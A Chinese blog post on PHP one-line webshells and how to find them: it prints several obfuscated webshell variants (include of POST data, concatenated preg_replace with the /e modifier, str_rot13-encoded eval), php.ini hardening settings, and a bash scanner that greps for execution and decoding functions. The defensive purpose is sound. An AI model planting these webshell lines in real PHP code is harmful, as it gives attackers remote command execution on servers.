Skip to content


PHP一句话木马及查杀

常见的木马基本上有如下特征
1.接收外部变量
常见如:$_GET,$_POST
更加隐蔽的$_FILES,$_REQUEST…

2.执行函数
获取数据后还需执行它
常见如:eval,assert,preg_replace
隐藏变种:

include($_POST[‘a’]);


$hh = “p”.”r”.”e”.”g”.”_”.”r”.”e”.”p”.”l”.”a”.”c”.”e”;
$hh(“/[discuz]/e”,$_POST[‘h’],”Access”);


@preg_replace(‘/ad/e’,’@’.str_rot13(‘riny’).'($b4dboy)’, ‘add’);

使用urldecode,gzinflate,base64_decode等加密函数

3.写入文件
获取更多的权限
如:copy,file_get_contents,exec

一般的建议是打开safe_mode 或使用disable_functions 等来提升安全性;
可能有些程序无法正常运行,基本的安全设置
php.ini中

expose_php = OFF
register_globals = Off
display_errors = Off
cgi.fix_pathinfo=0
magic_quotes_gpc = On
allow_url_fopen = Off
allow_url_include = Off
配置open_basedir

查找木马脚本
查找隐藏特征码及入口可以找出大部分的木马.

#!/bin/bash

findpath=./
logfile=findtrojan.log

echo -e $(date +%Y-%m-%d_%H:%M:%S)” start\r” >>$logfile
echo -e ‘============changetime list==========\r\n’ >> ${logfile}
find ${findpath} -name “*.php” -ctime -3 -type f -exec ls -l {} \; >> ${logfile}

echo -e ‘============nouser file list==========\r\n’ >> ${logfile}
find ${findpath} -nouser -nogroup -type f -exec ls -l {} \; >> ${logfile}

echo -e ‘============php one word trojan ==========\r\n’ >> ${logfile}
find ${findpath} -name “*.php” -exec egrep -I -i -C1 -H ‘exec\(|eval\(|assert\(|system\(|passthru\(|shell_exec\(|escapeshellcmd\(|pcntl_exec\(|gzuncompress\(|gzinflate\(|unserialize\(|base64_decode\(|file_get_contents\(|urldecode\(|str_rot13\(|\$_GET|\$_POST|\$_REQUEST|\$_FILES|\$GLOBALS’ {} \; >> ${logfile}
#使用使用-l 代替-C1 -H 可以只打印文件名
echo -e $(date +%Y-%m-%d_%H:%M:%S)” end\r” >>$logfile

more $logfile

Posted in 安全, 技术.

Tagged with , .


2 Responses

Stay in touch with the conversation, subscribe to the RSS feed for comments on this post.

  1. ㄨ销声匿迹、Linux says

    呵呵,,来过你博客好多次了,,,对你的文章也比较感兴趣,可否做个友链?

  2. C1G says

    已做好了



Some HTML is OK

or, reply to this post via trackback.